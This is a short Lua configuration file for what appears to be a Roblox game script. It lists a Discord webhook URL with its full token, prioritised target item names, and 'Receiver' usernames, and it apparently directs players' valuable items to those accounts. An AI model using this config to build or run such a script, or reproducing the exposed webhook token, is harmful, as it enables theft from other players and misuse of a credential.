-- 🔗 Shared Config (by PhatLee)
local config = {}

-- ====== Giới hạn giá ======
config.PRICE_LIMIT = 10_000_000

config.WEBHOOK = "https://discord.com/api/webhooks/1410618016487444490/5Z5XqXUsfd7lFbxgXcCMMQqJDU_iGPc-h0AjLA09mqz-DRaIYpKP7aMVQhM6lm9oIgTv"

-- ====== Target Names có ưu tiên ======
config.targetNames = {
    {name = "Strawberry Elephant", priority = 1},
    {name = "Dragon Cannelloni", priority = 2},
    {name = "Spooky and Pumky", priority = 3},
    {name = "La Secret Combinasion", priority = 4},
    {name = "Spaghetti Tualetti", priority = 5},
    {name = "Garama and Madundung", priority = 6},
    {name = "Los Hotspotsitos", priority = 7},
    {name = "Los Bros", priority = 8},
    {name = "Ketchuru and Musturu", priority = 9},
    {name = "La Supreme Combinasion", priority = 10},
    {name = "Ketupat Kepat", priority = 11},
    {name = "Esok Sekolah", priority = 12},
    {name = "Los Nooo My Hotspotsitos", priority = 13},
    {name = "Nooo My Hotspot", priority = 14},
    {name = "Nuclearo Dinossauro", priority = 15},
    {name = "La Grande Combinasion", priority = 16},
    {name = "Los Combinasionas", priority = 17},
    {name = "Tacorita Bicicleta", priority = 18},
    {name = "Los Lucky Blocks", priority = 19},
    {name = "Secret Lucky Block", priority = 20},
    {name = "Admin Lucky Block", priority = 21},
    {name = "67", priority = 22},
    {name = "Taco Lucky Block", priority = 23},
}

config.Displayname = { "Sweet", "phatle8117", "PhuBeo" }

config.Receiver = {"phatle8117", "ConCuTiHon02", "candyblossom1243", "bomaylatip", "banpetuytin1111", " banpetuytin11114", "banpetuytin11115", " banpetuytin111140"}

return config